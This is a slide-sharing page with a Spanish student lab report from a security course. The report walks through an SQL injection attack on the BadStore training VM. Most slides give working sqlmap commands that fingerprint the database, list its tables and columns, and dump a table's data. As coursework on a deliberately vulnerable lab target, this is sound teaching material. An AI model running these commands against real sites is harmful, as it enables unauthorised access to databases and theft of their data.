9

Click here to load reader

Ataque inyeccion sql

Embed Size (px)

DESCRIPTION

Practica de laboratorio momento 2 del curso Seguridad en Bases de Datos sobre inyección de código SQL

Citation preview

Page 1: Ataque inyeccion sql

Especialización en

Seguridad Informática

• Ataque por inyección de

código SQL

Estudiante: Daniel Felipe Palomo Luna

Ibagué, Septiembre de 2014

Page 2: Ataque inyeccion sql

Ataque por inyección de

código SQL

1. Teniendo la imagen

ISO de BadStore

configurada en una

maquina virtual de

Virtualbox, se procede

a conocer la dirección

IP asignada para

ingresar vía web

desde el equipo donde

se realizara el ataque

a la Base de Datos.

Page 3: Ataque inyeccion sql

2. Luego de conocer la

dirección IP, en este caso

asignada la 192.168.1.3

mediante DHCP, se

procede a ingresar desde

un navegador web para

verificar el funcionamiento

del servidor web.

Ataque por inyección de

código SQL

Page 4: Ataque inyeccion sql

3. Dentro del sitio web, se

debe explorar cada uno de

los menús para visualizar

las diferentes páginas

alojadas, con esto se logra

obtener en la URL la

primera vulnerabilidad:

Manejo de variables con

métodos GET Y POST

Variable encontrada: action

Ataque por inyección de

código SQL

Page 5: Ataque inyeccion sql

4. Al conocer una de las variables que maneja la página a nivel de programación, se

logra el descubrimiento del motor y la versión de la Base de Datos con el siguiente

comando:

sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b

Ataque por inyección de

código SQL

Page 6: Ataque inyeccion sql

5. Obtención del nombre de la Base de Datos con el siguiente comando:

sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0"

--current-db

Ataque por inyección de

código SQL

Page 7: Ataque inyeccion sql

6. Obtención del listado de tablas de la Base de Datos con el siguiente comando:

sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0"

--tables -D badstoredb

Ataque por inyección de

código SQL

Page 8: Ataque inyeccion sql

7. Obtención del listado de columnas de la tabla itemdb de la Base de Datos con el

siguiente comando:sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0"

-D badstoredb -T itemdb --columns

Ataque por inyección de

código SQL

Page 9: Ataque inyeccion sql

8. Visualización de los datos almacenados en la tabla itemdb de la Base de Datos con

el siguiente comando:sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0"

-D badstoredb -T itemdb -C ldesc --dump

Ataque por inyección de

código SQL


inyeccion lanos

inyeccion lanos

Documents
Inyeccion Megane

Inyeccion Megane

Documents
Inyeccion Ppp

Inyeccion Ppp

Documents
Seminario Basico de Inyeccion.(Molde de Inyeccion

Seminario Basico de Inyeccion.(Molde de Inyeccion

Documents
Inyeccion Electronica

Inyeccion Electronica

Documents
ATAQUES POR INYECCION DE CODIGO SQL Se conoce como Inyección SQL, indistintamente, al tipo de vulnerabilidad, al método de infiltración, al hecho de

ATAQUES POR INYECCION DE CODIGO SQL Se conoce como Inyección SQL, indistintamente, al tipo de vulnerabilidad, al método de infiltración, al hecho de

Documents
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB

ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB

Presentations & Public Speaking
inyeccion rocas

inyeccion rocas

Documents
Estudo visando a mitigação do ataque sql injection em aplicações web

Estudo visando a mitigação do ataque sql injection em aplicações web

Documents
Inyeccion Coquito

Inyeccion Coquito

Documents
Ataques de Inyeccion SQL Avanzadov1.1

Ataques de Inyeccion SQL Avanzadov1.1

Documents
Inyeccion de

Inyeccion de

Documents
Sistema de inyeccion,calibracion de bombas de inyeccion

Sistema de inyeccion,calibracion de bombas de inyeccion

Technology
inyeccion monopunto

inyeccion monopunto

Documents
Ataque sql web

Ataque sql web

Education
Memòria inyeccion

Memòria inyeccion

Education
motronic inyeccion

motronic inyeccion

Documents
Trabajo Inyeccion

Trabajo Inyeccion

Documents
Inyeccion Final

Inyeccion Final

Documents
Inyeccion Diesel.ppt

Inyeccion Diesel.ppt

Documents
Curso Sistemas Inyeccion Convencional Diesel Inyeccion Electronica Eui Heui

Curso Sistemas Inyeccion Convencional Diesel Inyeccion Electronica Eui Heui

Documents
Inyeccion sql

Inyeccion sql

Education
Informe inyeccion

Informe inyeccion

Documents
Inyeccion Diesel

Inyeccion Diesel

Documents
INYECCION SQL(SEGURIDAD DE LA INFORMACION)

INYECCION SQL(SEGURIDAD DE LA INFORMACION)

Technology
Ataque por inyección de código sql

Ataque por inyección de código sql

Technology
INYECCION CAPILAR

INYECCION CAPILAR

Documents
Momento 2 Bases de Datos - Inyeccion SQL y Sniffing

Momento 2 Bases de Datos - Inyeccion SQL y Sniffing

Engineering
ATAQUE POR INYECCIÓN DE CÓDIGO SQL

ATAQUE POR INYECCIÓN DE CÓDIGO SQL

Presentations & Public Speaking
Inyeccion SQL by Unknownssystem

Inyeccion SQL by Unknownssystem

Documents